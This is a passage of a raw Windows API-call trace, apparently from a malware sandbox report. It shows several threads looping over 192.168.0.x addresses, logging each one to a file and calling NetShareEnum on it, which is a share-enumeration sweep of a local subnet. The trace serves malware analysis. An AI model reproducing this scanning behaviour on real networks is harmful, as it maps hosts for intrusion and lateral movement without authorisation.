lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.942] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.69", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.69", lpUsedDefaultChar=0x0) returned 14 [0132.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0132.942] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.942] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0132.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0132.942] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.942] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0132.942] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x271fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x271fc54*=0x10, lpOverlapped=0x0) returned 1 [0132.946] NetShareEnum (in: servername="\\\\192.168.0.69", level=0x1, bufptr=0x271fedc, prefmaxlen=0xffffffff, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc | out: bufptr=0x271fedc, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc) returned 0x35 [0172.264] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.131", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0172.264] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.131", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.131", lpUsedDefaultChar=0x0) returned 15 [0172.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0172.264] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.264] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0172.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0172.264] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.264] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0172.264] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x271fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x271fc54*=0x11, lpOverlapped=0x0) returned 1 [0172.268] NetShareEnum (in: servername="\\\\192.168.0.131", level=0x1, bufptr=0x271fedc, prefmaxlen=0xffffffff, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc | out: bufptr=0x271fedc, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc) returned 0x35 [0205.903] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.200", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.200", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.200", lpUsedDefaultChar=0x0) returned 15 [0205.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.904] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x271fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x271fc54*=0x11, lpOverlapped=0x0) returned 1 [0205.979] NetShareEnum (in: servername="\\\\192.168.0.200", level=0x1, bufptr=0x271fedc, prefmaxlen=0xffffffff, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc | out: bufptr=0x271fedc, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc) returned 0x35 [0257.942] SetEvent (hEvent=0x1dc) returned 1 [0257.942] RtlExitUserThread (Status=0x0) Thread: id = 25 os_tid = 0x864 [0088.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.7", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.7", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.7", lpUsedDefaultChar=0x0) returned 13 [0088.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.094] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.094] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x285fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x285fc54*=0xf, lpOverlapped=0x0) returned 1 [0088.170] NetShareEnum (in: servername="\\\\192.168.0.7", level=0x1, bufptr=0x285fedc, prefmaxlen=0xffffffff, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc | out: bufptr=0x285fedc, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc) returned 0x35 [0125.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.65", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0125.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.65", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.65", lpUsedDefaultChar=0x0) returned 14 [0125.983] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0125.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0125.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0125.983] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0125.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0125.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0125.983] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x285fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x285fc54*=0x10, lpOverlapped=0x0) returned 1 [0125.994] NetShareEnum (in: servername="\\\\192.168.0.65", level=0x1, bufptr=0x285fedc, prefmaxlen=0xffffffff, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc | out: bufptr=0x285fedc, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc) returned 0x35 [0172.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.133", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0172.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.133", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.133", lpUsedDefaultChar=0x0) returned 15 [0172.276] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0172.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0172.276] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0172.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0172.276] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x285fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x285fc54*=0x11, lpOverlapped=0x0) returned 1 [0172.288] NetShareEnum (in: servername="\\\\192.168.0.133", level=0x1, bufptr=0x285fedc, prefmaxlen=0xffffffff, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc | out: bufptr=0x285fedc, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc) returned 0x35 [0205.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.196", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.196", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.196", lpUsedDefaultChar=0x0) returned 15 [0205.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x285ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.872] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x285fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x285fc54*=0x11, lpOverlapped=0x0) returned 1 [0205.877] NetShareEnum (in: servername="\\\\192.168.0.196", level=0x1, bufptr=0x285fedc, prefmaxlen=0xffffffff, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc | out: bufptr=0x285fedc, entriesread=0x285fed4, totalentries=0x285fed0, resume_handle=0x285fecc) returned 0x35 [0257.974] SetEvent (hEvent=0x1dc) returned 1 [0257.974] RtlExitUserThread (Status=0x0) Thread: id = 26 os_tid = 0x810 [0088.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.5", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.5", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.5", lpUsedDefaultChar=0x0) returned 13 [0088.091] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.091] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.091] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x299fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x299fc54*=0xf, lpOverlapped=0x0) returned 1 [0088.092] NetShareEnum (in: servername="\\\\192.168.0.5", level=0x1, bufptr=0x299fedc, prefmaxlen=0xffffffff, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc | out: bufptr=0x299fedc, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc) returned 0x35 [0132.963] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.72", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.963] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.72", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.72", lpUsedDefaultChar=0x0) returned 14 [0132.963] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0132.963] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.963] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0132.963] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0132.963] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.963] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0132.963] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x299fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x299fc54*=0x10, lpOverlapped=0x0) returned 1 [0132.973] NetShareEnum (in: servername="\\\\192.168.0.72", level=0x1, bufptr=0x299fedc, prefmaxlen=0xffffffff, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc | out: bufptr=0x299fedc, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc) returned 0x35 [0172.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.137", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0172.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.137", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.137", lpUsedDefaultChar=0x0) returned 15 [0172.304] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0172.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0172.304] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x299ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0172.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0172.304] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x299fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x299fc54*=0x33, lpOverlapped=0x0) returned 1 [0172.323] NetShareEnum (in: servername="\\\\192.168.0.137", level=0x1, bufptr=0x299fedc, prefmaxlen=0xffffffff, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc | out: bufptr=0x299fedc, entriesread=0x299fed4, totalentries=0x299fed0, resume_handle=0x299fecc) returned 0x35 [0205.886] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.198", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 